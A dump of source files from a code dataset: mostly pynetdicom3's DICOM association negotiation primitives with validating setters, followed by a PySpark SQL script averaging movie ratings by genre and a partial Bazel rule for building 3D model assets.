usr_data_neg.append(impl_class_uid)\n\n Attributes\n ----------\n implementation_class_uid : pydicom.uid.UID, bytes or str\n The UID to use\n \"\"\"\n\n def __init__(self):\n self.implementation_class_uid = None\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.ImplementationClassUIDSubItem\n\n Raises\n ------\n ValueError\n If no UID is set\n \"\"\"\n if self.implementation_class_uid is None:\n LOGGER.error(\"The Implementation Class UID must be set prior to \"\n \"requesting Association\")\n raise ValueError(\"The Implementation Class UID must be set \"\n \"prior to requesting Association\")\n\n item = ImplementationClassUIDSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def implementation_class_uid(self):\n \"\"\"Return the Implementation Class UID.\"\"\"\n return self._implementation_class_uid\n\n @implementation_class_uid.setter\n def implementation_class_uid(self, value):\n \"\"\"Sets the Implementation Class UID parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The value for the Implementation Class UID\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n raise TypeError(\"Implementation Class UID must be a \"\n \"pydicom.uid.UID, str or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"Implementation Class UID is an invalid UID\")\n raise ValueError(\"Implementation Class UID is an invalid UID\")\n\n self._implementation_class_uid = value\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = \"Implementation Class UID\\n\"\n s += \" Implementation class UID: {0!s}\\n\" \\\n .format(self.implementation_class_uid)\n return s\n\n\nclass ImplementationVersionNameNotification(ServiceParameter):\n \"\"\"The Implementation Version Name Notification primitive.\n\n The implementation identification notification allows implementations of\n communicating AEs to identify each other at Association establishment time.\n It is intended to provider respective and non-ambiguous identification in\n the event of communication problems encountered between two nodes. This\n negotiation is required.\n\n Implementation identification relies on two pieces of information:\n - Implementation Class UID (required)\n - Implementation Version Name (optional)\n\n The Implementation Version Name is optional and there may only be a single\n ImplementationVersionName item\n\n PS3.7 Annex D.3.3.2\n\n Attributes\n ----------\n implementation_version_name : str or bytes\n The version name to use, maximum of 16 characters\n \"\"\"\n\n def __init__(self):\n self.implementation_version_name = None\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.ImplementationVersionNameSubItem\n\n Raises\n ------\n ValueError\n If no name is set\n \"\"\"\n if self.implementation_version_name is None:\n raise ValueError(\"Implementation Version Name must be set prior \"\n \"to Association\")\n\n item = ImplementationVersionNameSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def implementation_version_name(self):\n \"\"\"Return the Implementation Version Name.\"\"\"\n return self._implementation_version_name\n\n @implementation_version_name.setter\n def implementation_version_name(self, value):\n \"\"\"Sets the Implementation Version Name parameter.\n\n Parameters\n ----------\n value : str or bytes\n The value for the Implementation Version Name\n\n Raises\n ------\n TypeError\n If `value` is not a str or bytes\n ValueError\n If `value` is empty or longer than 16 characters\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, str):\n value = codecs.encode(value, 'utf-8')\n elif isinstance(value, bytes):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"Implementation Version Name must be a str or bytes\")\n raise TypeError(\"Implementation Version Name must be a str \"\n \"or bytes\")\n\n if value is not None and not 1 < len(value) < 17:\n raise ValueError(\"Implementation Version Name must be \"\n \"between 1 and 16 characters long\")\n\n self._implementation_version_name = value\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = \"Implementation Version Name\\n\"\n s += \" Implementation version name: {0!s}\\n\".format(\n self.implementation_version_name)\n return s\n\n\nclass AsynchronousOperationsWindowNegotiation(ServiceParameter):\n \"\"\"\n Allows peer AEs to negotiate the maximum number of outstanding operation\n or sub-operation requests. This negotiation is optional.\n\n The Asynchronous Operations Window is optional and there may only be a\n single AsynchronousOperationsWindowNegotiation item\n\n PS3.7 Annex D.3.3.3\n\n Identical for both A-ASSOCIATE-RQ and A-ASSOCIATE-AC\n\n Attributes\n ----------\n maximum_number_operations_invoked : int\n The maximum number of asynchronous operations invoked by the AE. A\n value of 0 indicates unlimited operations (default 1)\n maximum_number_operations_performed : int\n The maximum number of asynchronous operations performed by the AE. A\n value of 0 indicates unlimited operations (default 1)\n \"\"\"\n\n def __init__(self):\n self.maximum_number_operations_invoked = 1\n self.maximum_number_operations_performed = 1\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.AsynchronousOperationsWindowSubItem\n \"\"\"\n item = AsynchronousOperationsWindowSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def maximum_number_operations_invoked(self):\n \"\"\"Return the Maximum Number Operations Invoked.\"\"\"\n return self._maximum_number_operations_invoked\n\n @maximum_number_operations_invoked.setter\n def maximum_number_operations_invoked(self, value):\n \"\"\"Sets the Maximum Number Operations Invoked parameter.\n\n Parameters\n ----------\n value : int\n The maximum number of operations invoked\n\n Raises\n ------\n TypeError\n If `value` is not an int\n ValueError\n If `value` is less than 0\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, int):\n pass\n else:\n LOGGER.error(\"Maximum Number Operations Invoked must be an int\")\n raise TypeError(\"Maximum Number Operations Invoked must be an int\")\n\n if value < 0:\n raise ValueError(\"Maximum Number Operations Invoked must be \"\n \"greater than 0\")\n\n self._maximum_number_operations_invoked = value\n\n @property\n def maximum_number_operations_performed(self):\n \"\"\"Return the Maximum Number Operations Performed.\"\"\"\n return self._maximum_number_operations_performed\n\n @maximum_number_operations_performed.setter\n def maximum_number_operations_performed(self, value):\n \"\"\"\n Sets the Maximum Number Operations Performed parameter\n\n Parameters\n ----------\n value : int\n The maximum number of operations performed\n\n Raises\n ------\n TypeError\n If `value` is not an int\n ValueError\n If `value` is less than 0\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if not isinstance(value, int):\n LOGGER.error(\"Maximum Number Operations Performed must be an int\")\n raise TypeError(\"Maximum Number Operations Performed must be \"\n \"an int\")\n\n if value < 0:\n raise ValueError(\"Maximum Number Operations Performed must be \"\n \"greater than 0\")\n\n self._maximum_number_operations_performed = value\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = \"Asynchronous Operations Window\\n\"\n s += \" Maximum number operations invoked: {0:d}\\n\".format(\n self.maximum_number_operations_invoked)\n s += \" Maximum number operations performed: {0:d}\\n\".format(\n self.maximum_number_operations_performed)\n return s\n\n\nclass SCP_SCU_RoleSelectionNegotiation(ServiceParameter):\n \"\"\"\n Allows peer AEs to negotiate the roles in which they will serve for each\n SOP Class or Meta SOP Class supported on the Association. This negotiation\n is optional.\n\n The Association Requestor may use one SCP/SCU Role Selection item for each\n SOP Class as identified by its corresponding Abstract Syntax Name and shall\n be one of three role values:\n - Requestor is SCU only\n - Requestor is SCP only\n - Requestor is both SCU/SCP\n\n If the SCP/SCU Role Selection item is absent the default role for a\n Requestor is SCU and for an Acceptor is SCP.\n\n For a Requestor support for each SOP Class shall be one of the following\n roles:\n * Requestor is SCU only\n * Requestor is SCP only\n * Requestor is both SCU and SCP\n\n PS3.7 Annex D.3.3.4\n\n Identical for both A-ASSOCIATE-RQ and A-ASSOCIATE-AC\n\n Attributes\n ----------\n sop_class_uid : pydicom.uid.UID, bytes or str\n The UID of the corresponding Abstract Syntax\n scu_role : bool\n False for non-support of the SCU role, True for support\n scp_role : bool\n False for non-support of the SCP role, True for support\n \"\"\"\n\n def __init__(self):\n self.sop_class_uid = None\n self.scu_role = None\n self.scp_role = None\n\n def from_primitive(self):\n \"\"\"\n Convert the primitive to a PDU item ready to be encoded\n\n Returns\n -------\n item : pynetdicom3.pdu.SCP_SCU_RoleSelectionSubItem\n\n Raises\n ------\n ValueError\n If no SOP Class UID, SCU Role or SCP Role is set\n ValueError\n If SCU Role and SCP Role are both False\n \"\"\"\n if self.sop_class_uid is None or self.scu_role is None \\\n or self.scp_role is None:\n LOGGER.error(\"SOP Class UID, SCU Role and SCP Role must \"\n \"to be set prior to Association\")\n raise ValueError(\"SOP Class UID, SCU Role and SCP Role must \"\n \"to be set prior to Association\")\n\n # To get to this point self.sop_class_uid must be set\n if not self.scu_role and not self.scp_role:\n LOGGER.error(\"SCU and SCP Roles cannot both be unsupported \"\n \"for %s\", self.sop_class_uid)\n raise ValueError(\"SCU and SCP Roles cannot both be unsupported \"\n \"for {}\".format(self.sop_class_uid))\n\n item = SCP_SCU_RoleSelectionSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def sop_class_uid(self):\n \"\"\"Return the SOP Class UID.\"\"\"\n return self._sop_class_uid\n\n @sop_class_uid.setter\n def sop_class_uid(self, value):\n \"\"\"Sets the SOP Class UID parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The corresponding Abstract Syntax UID\n\n Raises\n ------\n TypeError\n If `value` is not a pydicom.uid.UID, bytes or str\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n LOGGER.error(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"Implementation Class UID is an invalid UID\")\n raise ValueError(\"Implementation Class UID is an invalid UID\")\n\n self._sop_class_uid = value\n\n @property\n def scu_role(self):\n \"\"\"Return the SCU Role.\"\"\"\n return self._scu_role\n\n @scu_role.setter\n def scu_role(self, value):\n \"\"\"Sets the SCU Role parameter.\n\n Parameters\n ----------\n value : bool\n True if supported, False otherwise\n\n Raises\n ------\n TypeError\n If `value` is not a bool\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bool):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"SCU Role must be boolean\")\n raise TypeError(\"SCU Role must be boolean\")\n\n self._scu_role = value\n\n @property\n def scp_role(self):\n \"\"\"Return the SCP Role.\"\"\"\n return self._scp_role\n\n @scp_role.setter\n def scp_role(self, value):\n \"\"\"Sets the SCP Role parameter.\n\n Parameters\n ----------\n value : bool\n True if supported, False otherwise (default)\n\n Raises\n ------\n TypeError\n If `value` is not a bool\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bool):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"SCP Role must be boolean\")\n raise TypeError(\"SCP Role must be boolean\")\n\n self._scp_role = value\n\n\nclass SOPClassExtendedNegotiation(ServiceParameter):\n \"\"\"\n Allows peer AEs to exchange application information defined by specific\n Service Class specifications. Each Service Class is required to document\n the application information it supports and how this information is\n negotiated between SCUs and SCPs.\n\n The SOP Class Extended Negotiation is optional and there may only be a\n single SOPClassExtendedNegotiation item for each available SOP Class UID.\n\n PS3.7 Annex D.3.3.5\n\n PS3.4 contains Service Class Specifications\n\n Identical for both A-ASSOCIATE-RQ and A-ASSOCIATE-AC\n\n Attributes\n ----------\n sop_class_uid : pydicom.uid.UID, bytes or str\n The UID of the SOP Class\n service_class_application_information : bytes\n The Service Class Application Information as per the Service Class\n Specifications (see PS3.4)\n \"\"\"\n\n def __init__(self):\n self.sop_class_uid = None\n self.service_class_application_information = None\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.SOPClassExtendedNegotiationSubItem\n\n Raises\n ------\n ValueError\n If `sop_class_uid` or `service_class_application_information` are\n not set\n \"\"\"\n if self.sop_class_uid is None \\\n or self.service_class_application_information is None:\n LOGGER.error(\"SOP Class UID and Service Class Application \"\n \"Information must be set prior to Association \"\n \"negotiation\")\n raise ValueError(\"SOP Class UID and Service Class Application \"\n \"Information must be set prior to Association \"\n \"negotiation\")\n\n item = SOPClassExtendedNegotiationSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def sop_class_uid(self):\n \"\"\"Return the SOP Class UID.\"\"\"\n return self._sop_class_uid\n\n @sop_class_uid.setter\n def sop_class_uid(self, value):\n \"\"\"Sets the SOP Class UID parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The corresponding Abstract Syntax UID\n\n Raises\n ------\n TypeError\n If `value` is not a pydicom.uid.UID, bytes or str\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n LOGGER.error(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"Implementation Class UID is an invalid UID\")\n raise ValueError(\"Implementation Class UID is an invalid UID\")\n\n self._sop_class_uid = value\n\n @property\n def service_class_application_information(self):\n \"\"\"Return the Service Class Application Information.\"\"\"\n return self._service_class_application_information\n\n @service_class_application_information.setter\n def service_class_application_information(self, value):\n \"\"\"Sets the Service Class Application Information parameter.\n\n Parameters\n ----------\n value : bytes\n The Service Class Application Information as per the Service Class\n Specifications (see PS3.4)\n\n Raises\n ------\n TypeError\n If `value` is not a bytes object\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bytes):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"Service Class Application Information should be a \"\n \"bytes object\")\n raise TypeError(\"Service Class Application Information should \"\n \"be a bytes object\")\n\n self._service_class_application_information = value\n\n\nclass SOPClassCommonExtendedNegotiation(ServiceParameter):\n \"\"\"\n Allows peer AEs to exchange generic application information.\n\n The SOP Class Common Extended Negotiation is optional and there may only be\n a single SOPClassCommonExtendedNegotiation item for each available SOP\n Class UID.\n\n PS3.7 Annex D.3.3.6\n\n Identical for both A-ASSOCIATE-RQ and A-ASSOCIATE-AC\n\n Attributes\n ----------\n sop_class_uid : pydicom.uid.UID, bytes or str\n The UID of the SOP Class\n service_class_uid : pydicom.uid.UID, bytes or str\n The UID of the corresponding Service Class\n related_general_sop_class_uid : list of (pydicom.uid.UID, bytes or str)\n Related General SOP Class UIDs (optional)\n \"\"\"\n\n def __init__(self):\n self.sop_class_uid = None\n self.service_class_uid = None\n self.related_general_sop_class_identification = []\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.SOPClassCommonExtendedNegotiationSubItem\n\n Raises\n ------\n ValueError\n If `sop_class_uid` or `service_class_uid` are not set\n \"\"\"\n if self.sop_class_uid is None or self.service_class_uid is None:\n LOGGER.error(\"SOP Class UID and Service Class UID must be set \"\n \"prior to Association negotiation\")\n raise ValueError(\"SOP Class UID and Service Class UID must be \"\n \"set prior to Association negotiation\")\n\n item = SOPClassCommonExtendedNegotiationSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def sop_class_uid(self):\n \"\"\"Return the SOP Class UID.\"\"\"\n return self._sop_class_uid\n\n @sop_class_uid.setter\n def sop_class_uid(self, value):\n \"\"\"Sets the SOP Class UID parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The SOP Class UID\n\n Raises\n ------\n TypeError\n If `value` is not a pydicom.uid.UID, bytes or str\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n LOGGER.error(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"Implementation Class UID is an invalid UID\")\n raise ValueError(\"Implementation Class UID is an invalid UID\")\n\n self._sop_class_uid = value\n\n @property\n def service_class_uid(self):\n \"\"\"Return the Service Class UID.\"\"\"\n return self._service_class_uid\n\n @service_class_uid.setter\n def service_class_uid(self, value):\n \"\"\"Sets the Service Class UID parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The corresponding Service Class UID\n\n Raises\n ------\n TypeError\n If `value` is not a pydicom.uid.UID, bytes or str\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n LOGGER.error(\"Service Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"Service Class UID must be a pydicom.uid.UID, \"\n \"str or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"Implementation Class UID is an invalid UID\")\n raise ValueError(\"Implementation Class UID is an invalid UID\")\n\n self._service_class_uid = value\n\n @property\n def related_general_sop_class_identification(self):\n \"\"\"Return the Related General SOP Class Identification\"\"\"\n return self._related_general_sop_class_identification\n\n @related_general_sop_class_identification.setter\n def related_general_sop_class_identification(self, uid_list):\n \"\"\"Sets the Service Class Application Information parameter.\n\n Parameters\n ----------\n uid_list : list of (pydicom.uid.UID, bytes or str)\n A list containing UIDs to be used in the Related General SOP Class\n Identification parameter\n\n Raises\n ------\n TypeError\n If `uid_list` is not a list\n ValueError\n If `uid_list` contains items that aren't UIDs\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(uid_list, list):\n # Test that all the items in the list are UID compatible and convert\n # them to pydicom.uid.UID if required\n valid_uid_list = []\n\n for uid in uid_list:\n if isinstance(uid, UID):\n pass\n elif isinstance(uid, str):\n uid = UID(uid)\n elif isinstance(uid, bytes):\n uid = UID(uid.decode('utf-8'))\n else:\n LOGGER.error(\"Related General SOP Class Identification \"\n \"must be a list of pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"Related General SOP Class \"\n \"Identification must be a list of \"\n \"pydicom.uid.UID, str or bytes\")\n\n if uid is not None and not uid.is_valid:\n LOGGER.error(\"Related General SOP Class \"\n \"Identification contains an invalid UID\")\n raise ValueError(\"Related General SOP Class contains \"\n \"an invalid UID\")\n\n valid_uid_list.append(uid)\n\n self._related_general_sop_class_identification = valid_uid_list\n else:\n LOGGER.error(\"Related General SOP Class Identification \"\n \"must be a list of pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"Related General SOP Class Identification \"\n \"must be a list of pydicom.uid.UID, str \"\n \"or bytes\")\n\n\nclass UserIdentityNegotiation(ServiceParameter):\n \"\"\"\n Allows peer AEs to exchange generic application information.\n\n The SOP Class Common Extended Negotiation is optional and there may only be\n a single SOPClassCommonExtendedNegotiation item for each available SOP\n Class UID.\n\n PS3.7 Annex D.3.3.7\n\n In general, a User Identity Negotiation request that is accepted will result\n in Association establishment and possibly a server response if requested\n and supported by the peer. If a server response is requested but not\n received then the Requestor must decide how to proceed.\n An Association rejected due to an authorisation failure will be indicated\n using Rejection Permanent with a Source of \"DICOM UL service provided (ACSE\n related function)\".\n\n How the Acceptor handles authentication is to be implemented by the end-user\n and is outside the scope of the DICOM standard.\n\n A-ASSOCIATE-RQ\n `user_identity_type`\n `positive_response_requested`\n `primary_field`\n `secondary_field`\n\n A-ASSOCIATE-AC\n The `server_response` parameter is required when a response to the User\n Identity Negotiation request is to be issued (although this depends on\n whether or not this is supported by the Acceptor).\n\n Attributes\n ----------\n user_identity_type : int or None\n A-ASSOCIATE-RQ only. One of the following values:\n * 1 - Username as string in UTF-8\n * 2 - Username as string in UTF-8 and passcode\n * 3 - Kerberos Service ticket\n * 4 - SAML Assertion\n positive_response_requested : bool\n A-ASSOCIATE-RQ only. True when requesting a response, False otherwise\n (default is False)\n primary_field : bytes or None\n A-ASSOCIATE-RQ only. Contains either the username, Kerberos Service\n ticket or SAML assertion depending on `user_identity_type`.\n secondary_field : bytes or None\n A-ASSOCIATE-RQ only. Only required if the `user_identity_type` is 2,\n when it should contain the passcode as a bytes object, None otherwise\n server_response : bytes or None\n A-ASSOCIATE-AC only. Shall contain the Kerberos Service ticket or SAML\n response if the `user_identity_type` in the Request was 3 or 4. Shall be\n None if `user_identity_type` was 1 or 2.\n \"\"\"\n\n def __init__(self):\n self.user_identity_type = None\n self.positive_response_requested = False\n self.primary_field = None\n self.secondary_field = None\n self.server_response = None\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.UserIdentitySubItemRQ or\n pynetdicom3.pdu.UserIdentitySubItemAC\n\n Raises\n ------\n ValueError\n If server_response is None and user_identity_type or primary_field\n are None\n ValueError\n If server_response is None and user_identity_type is 2 and\n secondary_field is None\n \"\"\"\n # Determine if this primitive is an -RQ or -AC\n if self.server_response is None:\n # Then an -RQ\n if self.user_identity_type is None or self.primary_field is None:\n LOGGER.error(\"User Identity Type and Primary Field must be \"\n \"set prior to Association negotiation\")\n raise ValueError(\"User Identity Type and Primary Field \"\n \"must be set prior to Association negotiation\")\n\n if self.user_identity_type == 2 and self.secondary_field is None:\n LOGGER.error(\"Secondary Field must be set when User Identity\"\n \"is 2\")\n raise ValueError(\"Secondary Field must be set when User \"\n \"Identity is 2\")\n\n item = UserIdentitySubItemRQ()\n\n else:\n # Then an -AC\n item = UserIdentitySubItemAC()\n\n item.FromParams(self)\n\n return item\n\n @property\n def user_identity_type(self):\n \"\"\"Return the User Identity Type.\"\"\"\n return self._user_identity_type\n\n @user_identity_type.setter\n def user_identity_type(self, value):\n \"\"\"Sets the User Identity Type parameter.\n\n Parameters\n ----------\n value : int\n One of the following:\n * 1 - Username as string in UTF-8\n * 2 - Username as string in UTF-8 and passcode\n * 3 - Kerberos Service ticket\n * 4 - SAML Assertion\n\n Raises\n ------\n TypeError\n If `value` is not an int or None\n ValueError\n If `value` is an int and is not 1, 2, 3 or 4\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, int):\n if value not in [1, 2, 3, 4]:\n LOGGER.error(\"User Identity Type must be 1, 2 3 or 4 if \"\n \"requesting Association, None otherwise\")\n raise ValueError(\"User Identity Type must be 1, 2 3 or 4 \"\n \"if requesting Association, None otherwise\")\n elif value is None:\n pass\n else:\n LOGGER.error(\"User Identity Type must be an int or None\")\n raise TypeError(\"User Identity Type must be an int or None\")\n\n self._user_identity_type = value\n\n @property\n def positive_response_requested(self):\n \"\"\"Return Positive Response Requested.\"\"\"\n return self._positive_response_requested\n\n @positive_response_requested.setter\n def positive_response_requested(self, value):\n \"\"\"Sets the Positive Response Requested parameter.\n\n Parameters\n ----------\n value : bool\n True if response requested, False otherwise\n\n Raises\n ------\n TypeError\n If `value` is not a bool\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bool):\n pass\n else:\n LOGGER.error(\"Positive Response Requested must be boolean\")\n raise TypeError(\"Positive Response Requested must be boolean\")\n\n self._positive_response_requested = value\n\n @property\n def primary_field(self):\n \"\"\"Return Primary Field.\"\"\"\n return self._primary_field\n\n @primary_field.setter\n def primary_field(self, value):\n \"\"\"Sets the Primary Field parameter.\n\n Parameters\n ----------\n value : bytes or None\n The username or Kerberos Service ticket as a bytes object\n\n Raises\n ------\n TypeError\n If `value` is not bytes or None\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bytes):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"Primary Field must be bytes if requesting \"\n \"Association, None otherwise\")\n raise TypeError(\"Primary Field must be bytes if requesting \"\n \"Association, None otherwise\")\n\n self._primary_field = value\n\n @property\n def secondary_field(self):\n \"\"\"Return the Secondary Field.\"\"\"\n return self._secondary_field\n\n @secondary_field.setter\n def secondary_field(self, value):\n \"\"\"Sets the Secondary Field parameter.\n\n Only used when User Identity Type is equal to 2.\n\n Parameters\n ----------\n value : bytes or None\n The passcode as a bytes object\n\n Raises\n ------\n TypeError\n If `value` is not bytes or None\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bytes):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"Secondary Field must be bytes if requesting \"\n \"Association with User Identity Type equal to 2, \"\n \"None otherwise\")\n raise TypeError(\"Secondary Field must be bytes if requesting \"\n \"Association with User Identity Type equal to 2, \"\n \"None otherwise\")\n\n self._secondary_field = value\n\n @property\n def server_response(self):\n \"\"\"Return the Server Response.\"\"\"\n return self._server_response\n\n @server_response.setter\n def server_response(self, value):\n \"\"\"Sets the Server Response parameter.\n\n Parameters\n ----------\n value : bytes or None\n The server response as a bytes object\n\n Raises\n ------\n TypeError\n If `value` is not bytes or None\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bytes):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"Server Response must be bytes or None\")\n raise TypeError(\"Server Response must be bytes or None\")\n\n self._server_response = value\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = 'User Identity Parameters\\n'\n if self.server_response is None:\n s += ' User identity type: {0:d}\\n'.format(\n self.user_identity_type)\n s += ' Positive response requested: {0!r}\\n' \\\n .format(self.positive_response_requested)\n s += ' Primary field: {0!s}\\n'.format(self.primary_field)\n s += ' Secondary field: {0!s}\\n'.format(self.secondary_field)\n else:\n s += ' Server response: {0!s}\\n'.format(self.server_response)\n\n return s\n","repo_name":"zdalih/wolfpacs","sub_path":"pnd3/pynetdicom3/pdu_primitives.py","file_name":"pdu_primitives.py","file_ext":"py","file_size_in_byte":77037,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"20111499961","text":"from pyspark.sql import SparkSession\nimport sys\nspark = SparkSession.builder.appName(\"Query3_SparkSQL\").getOrCreate()\n\n# The user must give the input format (csv || parquet)\n\n# For example:\n# spark-submit SparkSqlquery3.py csv\n# to read csv file\n\ninput_format = sys.argv[1]\n\nif input_format == 'parquet':\n movie_genres = spark.read.parquet(\"hdfs://master:9000/movies/movie_genres.parquet\")\n movies = spark.read.parquet(\"hdfs://master:9000/movies/movies.parquet\")\n ratings = spark.read.parquet(\"hdfs://master:9000/movies/ratings.parquet\")\nelse:\n movies = spark.read.option(\"header\",\"false\").option(\"delimiter\",\",\").option(\"inferSchema\",\"true\").csv(\"hdfs://master:9000/movies/movies.csv\")\n movie_genres = spark.read.option(\"header\",\"false\").option(\"delimiter\",\",\").option(\"inferSchema\",\"true\").csv(\"hdfs://master:9000/movies/movie_genres.csv\")\n ratings = spark.read.option(\"header\",\"false\").option(\"delimiter\",\",\").option(\"inferSchema\",\"true\").csv(\"hdfs://master:9000/movies/ratings.csv\")\n\nmovies.registerTempTable(\"movies\")\nratings.registerTempTable(\"ratings\")\nmovie_genres.registerTempTable(\"movie_genres\")\n\nsqlString = \"select a.Genre as Movie_Genre, avg(b.Rating) as Avg_Rating, count(b.ID) as No_of_movies \\\n from \\\n (select distinct _c1 as Genre, _c0 as aID from movie_genres)a \\\n inner join ( \\\n select distinct _c1 as ID, avg(_c2) as Rating from ratings where _c2 is not null group by _c1\\\n )b \\\n on a.aID = b.ID \\\n group by Genre\\\n order by Genre\"\n\nres = spark.sql(sqlString)\nres.show()","repo_name":"FayStatha/atds-project-NTUA-2021","sub_path":"code/PART A/Spark SQL/SparkSqlquery3.py","file_name":"SparkSqlquery3.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38364513697","text":"\"\"\"Build Model assets from source 3d asset files like fbx, obj, gltf, etc.\"\"\"\n\nload(\"//third_party/fplbase:build_defs.bzl\", \"fpl_png_assets\")\n\ndef build_model(\n name,\n srcs,\n textures = [],\n extra_srcs = [],\n strip_prefix = \"\",\n attrib = None,\n ext = \"lullmodel\",\n visibility = [\"//visibility:public\"]):\n \"\"\"Generates a fplmesh binary from source files.\n\n Args:\n name: name for the filegroup contain the set of generated motiveanim files\n srcs: list of 3d asset files\n textures: list of all textures associated with the model\n strip_prefix: optional string, will be stripped from all input file paths\n in output file generation. All subdirectories after\n strip_prefix will be retained.\n attrib: a string specifying which vertex attributes should be output.\n ext: A file extension to replace each input file extension with for output.\n visibility: The visibility of the entity target. Defaults to public.\n \"\"\"\n tool = \"//lullaby/tools/model_pipeline\"\n\n outs = []\n textures_name = \"%s_textures\" % name\n if textures:\n fpl_png_assets(\n name = textures_name,\n srcs = textures,\n strip_prefix = strip_prefix,\n webp_quality = 90,\n )\n\n for src in srcs:\n # Replace source file extension with output file extension\n out = \".\".join(src.split(\".\")[:-1]) + \".\" + ext\n if strip_prefix:\n out = out.split(strip_prefix + \"/\")[-1]\n\n cmd = []\n if textures:\n cmd += [\"textures=\\\"\\\";\"]\n cmd += [\"for f in $(locations %s); do\" % (\":\" + textures_name)]\n cmd += [\" textures+=$$f\\\";\\\";\"]\n cmd += [\"done;\"]\n cmd += [\"$(location %s)\" % tool]\n cmd += [\"--input $(location %s)\" % src]\n cmd += [\"--schema schemas/lull/model_pipeline_def.fbs\"]\n if attrib:\n cmd += [\"--attrib %s\" % attrib]\n if ext:\n cmd += [\"--ext %s\" % ext]\n cmd += [\"--outdir $(@D)\"]\n cmd += [\"--output $@\"]\n genrule_srcs = [src]\n if textures:\n cmd += [\"--textures \\\"$$textures\\\";\"]\n genrule_srcs += [\":\" + textures_name]\n if extra_srcs:\n genrule_srcs += extra_srcs\n\n native.genrule(\n name = \"build_%s\" % 